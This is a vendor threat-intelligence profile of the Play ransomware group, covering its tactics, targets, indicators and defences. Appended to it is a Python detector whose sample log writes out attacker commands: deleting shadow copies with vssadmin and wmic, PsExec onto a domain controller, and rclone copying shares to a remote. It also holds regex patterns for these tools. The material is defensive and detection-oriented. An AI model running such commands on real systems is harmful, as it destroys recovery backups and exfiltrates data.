
Play Ransomware Group

1. Overview

Play, also known as PlayCrypt, is a financially motivated ransomware group first identified in June 2022. The group has quickly gained notoriety for its double extortion techniques, its targeting of both Windows and Linux/ESXi environments, and a unique, minimalist style of communication. Its ransom notes are often starkly simple—containing only the word “PLAY”—followed by contact details for negotiation via TOR.

Play operates a semi-closed Ransomware-as-a-Service (RaaS) model, suggesting a core team coordinates operations while partnering with trusted affiliates or deploying attacks directly. The group has conducted widespread campaigns affecting organisations across Europe, the Americas, and Asia, with a strong emphasis on government entities, legal services, finance, and manufacturing.


2. Origin and Evolution

Play was first discovered in mid-2022 during an investigation into ransomware campaigns affecting Latin American government agencies. Initial payloads bore similarities to older ransomware strains such as Hive and Quantum, suggesting that Play may have evolved from or shared development resources with former operators of those groups.

Since its emergence, Play has actively updated its tooling. It now supports full encryption of VMware ESXi environments, enabling attackers to cripple virtual infrastructure—a tactic increasingly seen in mature ransomware operations.


3. Tactics, Techniques, and Procedures (TTPs)

Play employs a broad set of intrusion tactics and demonstrates a preference for known vulnerabilities and credential-based attacks:

  • Initial Access:
    Exploitation of public-facing applications (T1190), brute-force and credential stuffing of RDP or VPN services (T1110), and phishing (T1566.001).
  • Lateral Movement:
    Use of Cobalt Strike, PsExec, RDP, and scheduled tasks to move laterally (T1021, T1053).
  • Data Exfiltration:
    Tools such as WinSCP and Rclone are used to exfiltrate sensitive files prior to encryption (T1041).
  • Encryption:
    The ransomware uses a custom, multithreaded encryption engine that appends extensions such as .play or .PLAYCRYPT. It is capable of targeting domain controllers, file shares, and virtualised environments.
  • Persistence & Evasion:
    Observed techniques include shadow copy deletion (T1490), process termination, registry modification (T1112), and the use of living-off-the-land binaries (LOLBins) to avoid detection.

4. Targeting Profile

Play targets a wide range of organisations with a focus on sectors likely to feel significant business impact from encryption and data leaks. Known targets include:

  • Government agencies and public service portals
  • Legal and financial firms with large data holdings
  • Manufacturing and logistics providers
  • Healthcare systems and managed service providers

Play has been active in the United Kingdom, and UK-based organisations—especially those with unpatched systems or exposed remote access points—should consider themselves at risk.


5. Notable Campaigns and Victims

Play has claimed responsibility for attacks on dozens of high-profile victims globally. Notable campaigns include:

  • Attacks against multiple municipal governments in Argentina and Brazil
  • A breach involving a European legal services provider, resulting in the leak of sensitive contracts and case records
  • The compromise of a North American finance firm, with client data posted publicly after ransom negotiations failed

The group often withholds full data releases, choosing instead to leak incrementally to apply pressure over time.


6. Ransomware and Leak Site Behaviour

Play maintains an active dark web leak site where it publishes stolen data and victim profiles. Its extortion model typically involves:

  1. Data exfiltration before encryption
  2. Deployment of ransomware across the victim’s estate
  3. A ransom note containing only the word “PLAY” and TOR-based contact details
  4. Staged publication of data on its leak site if payment is not made

Play’s leak site is updated frequently and often lists government, legal, and private sector entities. Its communication style is direct, and it frequently offers proof of compromise during initial contact.


7. Technical Indicators

Common indicators of compromise (IOCs) associated with Play include:

  • File extensions: .play, .PLAYCRYPT, or .PLAY
  • Use of rclone.exe and winscp.exe for data exfiltration
  • Creation of scheduled tasks for payload execution
  • Deletion of shadow copies using vssadmin and wmic
  • Outbound connections to command-and-control nodes hosted in Eastern Europe and Southeast Asia

YARA rules and detection logic are available to UK Cyber Defence Ltd clients upon request.


8. Defensive Measures and Recommendations

To reduce risk from Play ransomware, organisations should:

  • Apply patches for known exploited vulnerabilities, especially Exchange Server and VPN gateways
  • Enforce multi-factor authentication (MFA) for all external access
  • Monitor for use of PsExec, RDP, and PowerShell by non-administrators
  • Maintain offline backups and verify restoration processes regularly
  • Implement network segmentation, especially around domain controllers and storage clusters
  • Conduct employee phishing awareness training
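As an added example (not part of this profile, and not UK Cyber Defence Ltd's own detection content), the following Python script runs the indicators from sections 3, 7 and 8 over a handful of constructed process-creation and file events: shadow copy deletion via vssadmin or wmic (T1490), rclone/WinSCP exfiltration tooling (T1041), scheduled task creation (T1053), PsExec use (T1021), the .play/.PLAYCRYPT extensions, and the section 8 recommendation to flag PsExec, RDP and PowerShell launched by non-administrators. The pipe-delimited log format, the host and user names, the administrator allow-list and every event line are assumptions made for the demonstration; real Sysmon or EDR telemetry needs its own parser.

```python
"""Toy detector for the Play ransomware indicators in this profile.

Added example: the log format, sample events, account names and allow-list
below are constructed for illustration and are not from the profile.
"""
import re
from collections import Counter, defaultdict
from dataclasses import dataclass

# Assumption: a static allow-list of accounts expected to run admin tooling.
ADMIN_USERS = {r"CORP\svc_backup", r"CORP\it_admin"}

# Process command-line rules: (rule name, ATT&CK technique cited in the profile, regex).
RULES = [
    ("shadow_copy_deletion", "T1490",
     re.compile(r"\bvssadmin(\.exe)?\b.*\bdelete\s+shadows|\bwmic(\.exe)?\b.*\bshadowcopy\b.*\bdelete\b", re.I)),
    ("exfil_tool", "T1041", re.compile(r"\b(rclone|winscp)\.exe\b", re.I)),
    ("scheduled_task_creation", "T1053", re.compile(r"\bschtasks(\.exe)?\b.*\s/create\b", re.I)),
    ("psexec_or_remote_shell", "T1021", re.compile(r"\b(psexec|psexesvc)(\.exe)?\b", re.I)),
]
# Section 8: PsExec, RDP (mstsc) and PowerShell by non-administrators.
ADMIN_TOOLING = re.compile(r"\b(psexec|powershell|mstsc)(\.exe)?\b", re.I)
# Section 7: extensions appended to encrypted files.
ENCRYPTED_EXT = re.compile(r"\.(play|playcrypt)$", re.I)

# Constructed sample telemetry: ts|type|host|user|payload (command line or file path).
SAMPLE_LOG = r"""
2025-05-02T01:12:03Z|process|FS01|CORP\it_admin|C:\Windows\System32\svchost.exe -k netsvcs
2025-05-02T01:14:40Z|process|FS01|CORP\jdoe|psexec.exe \\DC01 -s cmd.exe
2025-05-02T01:15:10Z|process|FS01|CORP\jdoe|vssadmin.exe delete shadows /all /quiet
2025-05-02T01:15:11Z|process|FS01|CORP\jdoe|wmic shadowcopy delete
2025-05-02T01:16:00Z|process|FS01|CORP\jdoe|schtasks /create /tn Updater /tr C:\Users\Public\u.exe /sc onlogon
2025-05-02T01:20:00Z|process|FS01|CORP\jdoe|rclone.exe copy D:\Shares remote:bucket
2025-05-02T01:25:00Z|file|FS01|CORP\jdoe|D:\Shares\Finance\Q1.xlsx.PLAYCRYPT
2025-05-02T02:00:00Z|process|FS01|CORP\svc_backup|powershell.exe -File C:\Scripts\backup.ps1
2025-05-02T02:05:00Z|process|FS01|CORP\jdoe|powershell.exe -File C:\Users\Public\run.ps1
"""


@dataclass(frozen=True)
class Alert:
    line_no: int
    rule: str
    technique: str
    user: str
    detail: str


def parse_line(line):
    """Split one pipe-delimited event into a dict; return None for blank or malformed lines."""
    fields = line.split("|", 4)
    if len(fields) != 5:
        return None
    ts, kind, host, user, payload = fields
    return {"ts": ts, "type": kind, "host": host, "user": user, "payload": payload}


def scan(log_text, admin_users=ADMIN_USERS):
    """Return every Alert raised by the rules above over the given log text."""
    alerts = []
    for n, line in enumerate(log_text.splitlines(), 1):
        ev = parse_line(line)
        if ev is None:
            continue
        if ev["type"] == "process":
            for name, technique, rx in RULES:
                if rx.search(ev["payload"]):
                    alerts.append(Alert(n, name, technique, ev["user"], ev["payload"]))
            if ADMIN_TOOLING.search(ev["payload"]) and ev["user"] not in admin_users:
                alerts.append(Alert(n, "admin_tool_non_admin", "T1021", ev["user"], ev["payload"]))
        elif ev["type"] == "file" and ENCRYPTED_EXT.search(ev["payload"]):
            # T1486 (Data Encrypted for Impact) is the standard ATT&CK ID; the profile does not cite it.
            alerts.append(Alert(n, "ransomware_extension", "T1486", ev["user"], ev["payload"]))
    return alerts


def summarize(alerts):
    """Count alerts per rule name."""
    return dict(Counter(a.rule for a in alerts))


def users_with_multiple_techniques(alerts, threshold=3):
    """Users that triggered at least `threshold` distinct techniques: the staging pattern, not a one-off."""
    seen = defaultdict(set)
    for a in alerts:
        seen[a.user].add(a.technique)
    return {user for user, techniques in seen.items() if len(techniques) >= threshold}


if __name__ == "__main__":
    found = scan(SAMPLE_LOG)
    for a in found:
        print(f"line {a.line_no}: {a.rule} ({a.technique}) user={a.user} :: {a.detail}")
    print("per-rule counts:", summarize(found))
    print("users showing a multi-technique pattern:", users_with_multiple_techniques(found))
```

Running the script prints one alert per matched event and then the accounts that triggered three or more distinct techniques, which is the signal worth paging on: a lone vssadmin call may be an administrator doing maintenance, but exfiltration tooling, shadow copy deletion and scheduled task creation from one non-admin account within minutes is the sequence described in sections 3 and 6.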

9. Attribution and Alliances

There is currently no public evidence linking Play to a nation-state. However, overlap in techniques and code suggests that some of its operators may have previously worked with groups such as Hive or Conti.

Play’s infrastructure, leak site architecture, and negotiation portals demonstrate a high level of operational discipline, likely indicating a core team supported by experienced affiliates.


10. Conclusion

Play is a fast-maturing ransomware threat with clear intent to disrupt, extort, and scale. Its support for cross-platform environments, strategic targeting, and silent operational tempo place it firmly among the most significant ransomware groups active today. UK organisations—especially in legal, financial, and public sectors—should treat Play as a credible and persistent threat requiring continuous defensive readiness.


Author:
Threat Intelligence Team, UK Cyber Defence Ltd
All intelligence current as of May 2025
